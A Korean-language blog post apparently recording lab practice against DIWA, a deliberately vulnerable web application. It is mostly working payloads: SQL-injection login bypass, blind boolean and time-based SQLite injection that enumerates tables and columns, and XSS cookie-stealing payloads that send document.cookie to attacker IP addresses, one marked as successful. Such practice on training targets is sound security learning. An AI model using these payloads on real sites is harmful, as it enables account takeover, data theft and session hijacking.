DIWA 우선 요약

Jang Seok Woo·2020년 9월 30일

개발환경 : SQLite, DIWA

(작성중)

sqlite3.exe chinook.db

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

' or 1=1 -- 로그인 인젝션 성공

유저, admin 개인정보 추출 및 비밀번호 변경 가능

error페이지에 sql query 노출 및 디렉토리 경로 노출

UPDATE diwa_users SET email = 'jsw4215van@gmail.com', country = 'Korea, Republic of', password = 'fd75163b67fd0934d70cb2801d70f21f' WHERE id = 1

time-based injection
DB유저명

insert into user_bbs values('12345','1','1','1','1');

select userpassword from user_bbs where userid='abc' and 1=1;

select user from dual;

' and (select case when ascii(substr(user,1,1))<100 then 1 else 1 end from dual)=1 --

select userpassword from user_bbs where userid='abc' or (select case when ascii(substr(user,1,1))<100 then 1 else 2 end from dual)=1 --

' or (select case when ascii(substr(user,1,1))<1000 then 1 else 2 end from dual)=1 --

' or (select case when ascii(substr(user,1,1))%3c1000 then 1 else 2 end from dual)=1 --

오라클이 아닌 것 같다

MySQL 연습

mysql -u root -p

show databases;

show tables;

select * from users where first_name='' or (select substring(version(),1,1)<10)=1;
version() 찾을 수 없다는 오류
MySQL도 아닌가?
select * from users where first_name='' or (select substring(DB_NAME(),1,1)<10)=1;
MSSQL아니고
select * from users where first_name='' or (select substr(sqlite_version(),1,1)<10)=1;

**Wrong Email or Password가 나오는걸로 봐서 sqlite가 의심된다.

SQLite

  • SQLite에는 information_schema 가 없고 sqlite_master 라는게 있다.

데이터베이스 조회

SELECT를 사용한 데이터베이스 조회는 없는듯 하다.

데이터베이스 버전 조회

sqlite_version()

테이블 갯수
원래 쿼리
select count() from sqlite_master;
boolean 적용 쿼리
select count(*)<100 from sqlite_master;

사이트 적용
' or (select count(*)<100 from sqlite_master)=1 --

*테이블 갯수 : 5개

테이블 조회

SELECT tbl_name FROM sqlite_master;

SELECT name FROM sqlite_master;

name 이랑 tbl_name 이랑 같음

컬럼 조회

SELECT * FROM information_schema.SCHEMATA;SELECT sql FROM sqlite_master WHERE name='테이블명' AND sql LIKE '%컬럼명%'

sql 컬럼에는 해당 테이블을 만들 때 사용한 SQL 문이 그대로 저장되어 있다. (e.g. CREATE TABLE 테이블명...)

select ascii(substr(sqlite_version(),1,1))<10;
ascii 함수가 먹히지 않음
select unicode(substr(sqlite_version(),1,1))<100;
unicode를 사용하면 됨
' or (select unicode(substr(sqlite_version(),1,1))<100)=1;
버전 확인함.

DB테이블명
select tbl_name from sqlite_master;
select tbl_name from sqlite_master limit 1;
select unicode(substr(tbl_name,1,1)) from sqlite_master limit 1;
select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 1;
(select unicode(substr(tbl_name,1,1))>100 from sqlite_master limit 1)=1;
예시 테스트
select email from customers where email='hughoreilly@apple.ie' or (select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 1)=1;

사이트 적용
' or (select unicode(substr(tbl_name,1,1))<1000 from sqlite_master limit 1)=1 --

*첫 테이블 명 : diwa_users

두번째 테이블명
select tbl_name from sqlite_master limit 1,1;
사이트 적용
'or (select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 1,1)=1 --
*두번째 테이블명 : sqlite_sequence

세번째 테이블명
select tbl_name from sqlite_master limit 2,1;

*세번째 테이블명: diwa_downloads

네번째 테이블명
select tbl_name from sqlite_master limit 3,1;

*네번째 테이블명 : diwa_threads

다섯번째 테이블명
select tbl_name from sqlite_master limit 4,1;

*다섯번째 테이블명 : diwa_posts

'or (select unicode(substr(tbl_name,1,1))<100 from sqlite_master limit 5,1)=1 --

DB테이블 컬럼 개수
기본 쿼리
select count(name)<10 from pragma_table_info('diwa');

사이트 적용
'or (select count(name)<100 from pragma_table_info('diwa'))=1 --
'or (select count()<10 from pragma_table_info('diwa_users'))=1 --
select count(*)=0 from pragma_table_info('diwa')

SELECT * FROM customers WHERE email = '' or select count(name)<100 from pragma_table_info('customers')

SELECT * FROM customers WHERE email = '' or (select count(name)<100 from pragma_table_info('customers'))=1;

DB테이블컬럼명
원래 쿼리
**SELECT name FROM PRAGMA_TABLE_INFO('customers') limit 1;
select unicode(substr(name,1,1))<100 from pragma_table_info('diwa') limit 1;

select c.name from pragma_table_info('customers') c limit 1;

' or 1=(select case when 1=1 then 1 else LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2)))) end) and '1'='1

' or 1=(select case when 1=(SELECT unicode(substr(name,1,1))<100 from pragma_table_info('diwa_user') limit 1) then 1 else LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2)))) end) and '1'='1

SELECT sql FROM sqlite_master WHERE tbl_name = 'customers' AND type = 'table'
SELECT count(sql) FROM sqlite_master WHERE tbl_name = 'customers' AND type = 'table'
사이트 적용
'or (select unicode(substr(name,1,1))<100 from pragma_table_info('diwa_users') limit 1)=1 --
'or ((select unicode(substr(c.name,1,1))<100 from pragma_table_info('diwa_users') c limit 1)=1) --
와 진짜 안됨..

  • 단어로 조회하는 방법
    SELECT sql FROM sqlite_master WHERE name='테이블이름' AND sql LIKE '%컬럼이름%'
    SELECT sql FROM sqlite_master WHERE name='customers' AND sql LIKE '%a%'
    select name from pragma_table_info('customers') where name like '%a%' limit 1;
    select count(name) from pragma_table_info('customers') where name like '%a%';

' or (select count(name)<100 from pragma_table_info('diwa_users') where name like '%a%')=1 --

도저히 안됨 물어볼 것.

  • python사용해서 시도해볼것

DB테이블 컬럼타입

XSS

Script_Tags are not allowed
<script>
<img src='0' onerror=alert("daniel")>
<svg onload=alert("XSS")>

<svg onload=alert("XSS")>

<svg window.open("http://192.168.0.51/cookie.php?data="+document.cookie,"small","width=50,heigtht=220, scrollbars=no,menubar=no")>

cookie

<script>window.open("http://192.168.0.51/cookie.php?data="+document.cookie,"small","width=50,heigtht=220, scrollbars=no,menubar=no")</script>
<iframe src="javascript:location='http://172.31.12.48/session/getsession.php?data='+document.cookie" width=0 height=0 frameborder=0></iframe>
<iframe src="javascript:location=\'http://192.168.0.51/cookie.php?data=\'+document.cookie" width=0 height=0 frameborder=0></iframe>

안됨

<iframe src="javascript:location=%27http://192.168.0.51/cookie.php?data=%27+document.cookie" width=0 height=0 frameborder=0></iframe>

성공

